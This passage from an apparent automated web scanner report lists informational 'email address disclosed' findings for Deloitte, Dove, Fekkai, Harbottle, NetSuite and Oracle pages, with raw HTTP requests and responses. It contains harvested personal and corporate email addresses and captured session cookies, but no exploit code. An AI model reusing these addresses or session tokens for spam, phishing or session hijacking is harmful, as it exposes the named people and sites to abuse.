+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...

22.41. http://www.deloitte.com/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 23 Jun 2011 09:36:38 GMT
Accept-Ranges: bytes
ETag: "057afc8931cc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:56:57 GMT
Content-Length: 4602
Connection: close

/**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down (b
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.42. http://www.dove.us/Resources/JS/colorbox/jquery.colorbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dove.us
Path:	/Resources/JS/colorbox/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /Resources/JS/colorbox/jquery.colorbox.js HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5jfk3byymtjxyinfzvf23uyi

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 03 Jun 2011 11:11:03 GMT
Accept-Ranges: bytes
ETag: "a09557edde21cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 25314
Date: Tue, 06 Sep 2011 16:45:43 GMT
Connection: close

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, document, window) {
   var
   // ColorBox Default Settings.
   // See http://colorpowered.com/colorb
...[SNIP]...

22.43. http://www.fekkai.com/js/mootools-1.2.4.2-more.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/js/mootools-1.2.4.2-more.js

Issue detail

The following email address was disclosed in the response:

fred@domain.com

Request

GET /js/mootools-1.2.4.2-more.js HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 126010
Connection: close
Content-Type: application/x-javascript

//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>,
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...

22.44. http://www.fekkai.com/js/multibox/multiBox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/js/multibox/multiBox.js

Issue detail

The following email address was disclosed in the response:

liam_smart@hotmail.com

Request

GET /js/multibox/multiBox.js HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 32264
Connection: close
Content-Type: application/x-javascript

/**************************************************************

   Script        : multiBox
   Version        : 2.0.2
   Authors        : Samuel Birch
   Desc        : Supports jpg, gif, png, flash, flv, mov, wmv, mp3, html, iframe
   Licence        : Open Source MIT Licence
   Modified    : Liam Smart (liam_smart@hotmail.com) - MooTools 1.2 upgrade
   Usage        : window.addEvent('domready', function(){
                    //call multiBox
                    var initMultiBox = new multiBox({
                        mbClass: '.mb',//class you need to add links that
...[SNIP]...

22.45. http://www.fekkai.com/js/multibox/overlay.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/js/multibox/overlay.js

Issue detail

The following email address was disclosed in the response:

liam_smart@hotmail.com

Request

GET /js/multibox/overlay.js HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 3030
Connection: close
Content-Type: application/x-javascript

/**************************************************************

   Script        : Overlay
   Version        : 2.0.2
   Authors        : Samuel Birch
   Desc        : Covers the window with a semi-transparent layer.
   Licence        : Open Source MIT Licence
   Modified    : Liam Smart (liam_smart@hotmail.com) - MooTools 1.2 upgrade

**************************************************************/

//start overlay class
var Overlay = new Class({

   //implements
   Implements: Options,

   //options

...[SNIP]...

22.46. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/article_view_hnl/1689.php

Issue detail

The following email addresses were disclosed in the response:

ben.bye@harbottle.com
dalton.odendaal@harbottle.com
michael.friend@harbottle.com
robert.mitchell@harbottle.com

Request

Response

22.47. http://www.harbottle.com/hnl/pages/pubs/479 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/pubs/479

Issue detail

The following email addresses were disclosed in the response:

mark.owen@harbottle.com
mark.phillips@harbottle.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<A href="mailto:mark.owen@harbottle.com">
...[SNIP]...
<A href="mailto:mark.phillips@harbottle.com">
...[SNIP]...

22.48. http://www.netsuite.com/portal/javascript/DD_roundies.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/javascript/DD_roundies.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /portal/javascript/DD_roundies.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 16853
Content-Disposition: inline;filename*=utf-8''DD_roundies.js
NS_RTIMER_COMPOSITE: 677907634:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=UTF-8
Cache-Control: max-age=1951
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.ad
...[SNIP]...

22.49. http://www.netsuite.com/portal/javascript/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/javascript/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /portal/javascript/jquery.colorbox-min.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343323|PC#1315341135013-154927.19#1316551063|check#true#1315341523

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 9029
Content-Disposition: inline;filename*=utf-8''jquery.colorbox-min.js
NS_RTIMER_COMPOSITE: 2008136444:73686F702D6A6176613030322E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: max-age=296
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
Vary: Accept-Encoding

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",
...[SNIP]...

22.50. http://www.netsuite.com/portal/javascript/jquery.colorbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/javascript/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /portal/javascript/jquery.colorbox.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343323|PC#1315341135013-154927.19#1316551063|check#true#1315341523

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 24023
Content-Disposition: inline;filename="jquery.colorbox.js"
NS_RTIMER_COMPOSITE: 233090667:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: max-age=3061
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
Vary: Accept-Encoding

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {

   var
   // ColorBox Default Settings.
   // See http://colorpowered.com/colorbox for
...[SNIP]...

22.51. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/bangladesh-316183-en-as.html

Issue detail

The following email addresses were disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM
aon.ali.siddiqui@oracle.com
karahman@ibcs-primax.com

Request

GET /as/corporate/contact/bangladesh-316183-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.52. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/bhutan-316187-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM

Request

GET /as/corporate/contact/bhutan-316187-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.53. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/brunei-316198-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_MY@ORACLE.COM

Request

GET /as/corporate/contact/brunei-316198-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.54. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/cambodia-316193-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_VN@ORACLE.COM

Request

GET /as/corporate/contact/cambodia-316193-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.55. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/laos-316260-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_VN@ORACLE.COM

Request

GET /as/corporate/contact/laos-316260-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.56. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/maldives-316209-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM

Request

GET /as/corporate/contact/maldives-316209-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.57. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/nepal-316215-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM

Request

GET /as/corporate/contact/nepal-316215-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.58. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/pakistan-316185-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_PK@ORACLE.COM

Request

GET /as/corporate/contact/pakistan-316185-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41104347125119295,0:1)
Date: Tue, 06 Sep 2011 16:17:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_PK@ORACLE.COM">SALESINQUIRY_PK@ORACLE.COM</a>
...[SNIP]...

22.59. http://www.oracle.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/sitemaps/sitemaps.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342466942; gpv_p24=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone; gpw_e24=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone; s_sq=oracleglobal%2Coraclecom%2Coracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 31 Aug 2011 13:57:01 GMT
ETag: "ad6050-75f4-4abcd80990540"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=234;ecid=11704818704187611,0:1)
Content-Length: 30196
Date: Tue, 06 Sep 2011 15:54:27 GMT
Connection: close

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.60. http://www.oracle.com/openworld/contact/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/contact/index.html

Issue detail

The following email addresses were disclosed in the response:

OpenWorldContent@gpj.com
OpenWorldExhibitor@gpj.com
OpenWorldHousing@gpj.com
OpenWorldReg@gpj.com
amy.loskutoff@oracle.com
openworldpartner_us@oracle.com

Request

Response

22.61. http://www.oracle.com/openworld/register/packages/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/register/packages/index.html

Issue detail

The following email address was disclosed in the response:

OpenWorldReg@gpj.com

Request

Response

22.62. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/partners/en/opn-program/membership-resources/business-center/index.html

Issue detail

The following email addresses were disclosed in the response:

opn-office_jp@oracle.com
partnerbusinesscenter-al_ww@oracle.com
partnerbusinesscenter-ao_ww@oracle.com
partnerbusinesscenter-asea_ww@oracle.com
partnerbusinesscenter-at_ww@oracle.com
partnerbusinesscenter-aunz_ww@oracle.com
partnerbusinesscenter-ba_ww@oracle.com
partnerbusinesscenter-be_ww@oracle.com
partnerbusinesscenter-bg_ww@oracle.com
partnerbusinesscenter-br_ww@oracle.com
partnerbusinesscenter-cari_ww@oracle.com
partnerbusinesscenter-chde_ww@oracle.com
partnerbusinesscenter-chfr_ww@oracle.com
partnerbusinesscenter-cl_ww@oracle.com
partnerbusinesscenter-cn_ww@oracle.com
partnerbusinesscenter-co_ww@oracle.com
partnerbusinesscenter-cr_ww@oracle.com
partnerbusinesscenter-cy_ww@oracle.com
partnerbusinesscenter-cz_ww@oracle.com
partnerbusinesscenter-de_ww@oracle.com
partnerbusinesscenter-dk_ww@oracle.com
partnerbusinesscenter-dsur_ww@oracle.com
partnerbusinesscenter-ec_ww@oracle.com
partnerbusinesscenter-ee_ww@oracle.com
partnerbusinesscenter-egsa_ww@oracle.com
partnerbusinesscenter-es_ww@oracle.com
partnerbusinesscenter-fi_ww@oracle.com
partnerbusinesscenter-fr_ww@oracle.com
partnerbusinesscenter-gr_ww@oracle.com
partnerbusinesscenter-gs_ww@oracle.com
partnerbusinesscenter-hk_ww@oracle.com
partnerbusinesscenter-hr_ww@oracle.com
partnerbusinesscenter-hu_ww@oracle.com
partnerbusinesscenter-id_ww@oracle.com
partnerbusinesscenter-ie_ww@oracle.com
partnerbusinesscenter-in_ww@oracle.com
partnerbusinesscenter-it_ww@oracle.com
partnerbusinesscenter-kr_ww@oracle.com
partnerbusinesscenter-kz_ww@oracle.com
partnerbusinesscenter-lt_ww@oracle.com
partnerbusinesscenter-lu_ww@oracle.com
partnerbusinesscenter-lv_ww@oracle.com
partnerbusinesscenter-mk_ww@oracle.com
partnerbusinesscenter-mt_ww@oracle.com
partnerbusinesscenter-mx_ww@oracle.com
partnerbusinesscenter-my_ww@oracle.com
partnerbusinesscenter-nas_ww@oracle.com
partnerbusinesscenter-nl_ww@oracle.com
partnerbusinesscenter-no_ww@oracle.com
partnerbusinesscenter-pe_ww@oracle.com
partnerbusinesscenter-ph_ww@oracle.com
partnerbusinesscenter-pl_ww@oracle.com
partnerbusinesscenter-pt_ww@oracle.com
partnerbusinesscenter-ro_ww@oracle.com
partnerbusinesscenter-rs_ww@oracle.com
partnerbusinesscenter-ru_ww@oracle.com
partnerbusinesscenter-sadc_ww@oracle.com
partnerbusinesscenter-se_ww@oracle.com
partnerbusinesscenter-sg_ww@oracle.com
partnerbusinesscenter-si_ww@oracle.com
partnerbusinesscenter-sk_ww@oracle.com
partnerbusinesscenter-th_ww@oracle.com
partnerbusinesscenter-tr_ww@oracle.com
partnerbusinesscenter-tw_ww@oracle.com
partnerbusinesscenter-ua_ww@oracle.com
partnerbusinesscenter-uk_ww@oracle.com
partnerbusinesscenter-ve_ww@oracle.com
partnerbusinesscenter-vn_ww@oracle.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41071516394601635,0:1)
Date: Tue, 06 Sep 2011 16:08:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 249980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
